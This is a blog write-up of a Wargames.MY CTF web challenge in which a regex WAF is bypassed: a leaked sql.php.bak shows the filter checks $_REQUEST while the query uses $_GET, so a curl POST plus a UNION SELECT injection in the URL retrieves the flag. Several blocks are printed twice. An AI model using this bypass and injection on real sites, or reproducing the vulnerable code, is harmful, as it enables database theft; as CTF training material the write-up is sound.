October 2018 - HuntForBug

It’s too late for me to submit the flag..lol!

So the challenge is:

So I heard you're hacker. I setup Super Next Gen. AumWAF to protect my l33t website.
Please hack my website.

Thanked!

http://supernext-gen-aumwaf.wargames.my/

Webpage:

sql.php page:

As expected, any sql injection attempt will return error message as below:

Nmap result: Noticed that “/*.bak” in robots.txt

root@kali:~/Desktop/htb/olympus# nmap -sS -sC supernext-gen-aumwaf.wargames.my -p 80
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-08 04:17 EDT
Nmap scan report for supernext-gen-aumwaf.wargames.my (128.199.161.191)
Host is up (0.0041s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-robots.txt: 4 disallowed entries 
|_/ /aumwaf.php /flag.php /*.bak
|_http-title: Protected by Next-Gen AumWAF

Nmap done: 1 IP address (1 host up) scanned in 2.57 seconds

root@kali:~/Desktop/htb/olympus# nmap -sS -sC supernext-gen-aumwaf.wargames.my -p 80

Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-08 04:17 EDT

Nmap scan report for supernext-gen-aumwaf.wargames.my (128.199.161.191)

Host is up (0.0041s latency).

PORT STATE SERVICE

80/tcp open http

| http-robots.txt: 4 disallowed entries

|_/ /aumwaf.php /flag.php /*.bak

|_http-title: Protected by Next-Gen AumWAF

Nmap done: 1 IP address (1 host up) scanned in 2.57 seconds

Let’s try to see if there is a backup file exist: sql.php.bak -> Yes!! it does exist!!

PHP file source code:

<?php
if( isset($_REQUEST['id']) ) {
    if(preg_match("/'?(?:\w*)\W*?[a-z].*(R|ELECT|OIN|NTO|HERE|NION)/i", $_REQUEST['id'])){
        die("Your request has been blocked by AumWAF");
    }
	$sql = $mysqli->query('SELECT * FROM tbl_hackme WHERE id = ' . $_GET['id']);
	if($mysqli->error) {
		echo($mysqli->error);
	} else {
		$data = $sql->fetch_object();
		echo $data->col1;
	}
}
?>

<?php

if( isset($_REQUEST['id']) ) {

if(preg_match("/'?(?:\w*)\W*?[a-z].*(R|ELECT|OIN|NTO|HERE|NION)/i", $_REQUEST['id'])){

die("Your request has been blocked by AumWAF");

}

$sql = $mysqli->query('SELECT * FROM tbl_hackme WHERE id = ' . $_GET['id']);

if($mysqli->error) {

echo($mysqli->error);

} else {

$data = $sql->fetch_object();

echo $data->col1;

}

First, I noticed $_REQUEST[‘id’] was sent to filter, but $_GET[‘id’] was sent to the a function. After some research I learnt that $_REQUEST gets values from $_GET, $_POST, $_COOKIE respectively. This is the default order defined in php.ini file and can be changed. [seriously i copy this info from somewhere]

The idea is changing request from GET to POST while keeping the GET parameters in the url. Since $_POST[‘id’] will overwrite $_REQUEST[‘id’] and our $_GET[‘id’] parameter will become free from the filter.

So, to get the flag (+ hint was provided):

root@kali:~/Desktop/CTF/wgmy-nano# curl -d "id=dummy" "http://supernext-gen-aumwaf.wargames.my/sql.php?id=1+and+1=2+union+select+1,flag,3+from+tbl_flag"
        
<style type="text/css">
        body {
          display: block;
          font-family: consolas !important;
          white-space: pre;
          font-size: 12px;
          margin: 1em 0px;
        }
        </style>

root@kali:~/Desktop/CTF/wgmy-nano# curl -d "id=dummy" "http://supernext-gen-aumwaf.wargames.my/sql.php?id=1+and+1=2+union+select+1,flag,3+from+tbl_flag"

body {

display: block;

font-family: consolas !important;

white-space: pre;

font-size: 12px;

margin: 1em 0px;

}

</style>

	wgmy{aumwaf_1z_th3_b3st_w4f}

1	wgmy{aumwaf_1z_th3_b3st_w4f}

Flag: wgmy{aumwaf_1z_th3_b3st_w4f}
Credit:
1. https://www.pwndiary.com/write-ups/sec-t-ctf-2017-naughty-ads-write-up-web200/
2. Ramadhan -> improvised my curl request.

[THE END]

Interactive Coloring

Monthly Archives: October 2018

NanoSec x Wargames.MY CTF – Super Next Generation WAF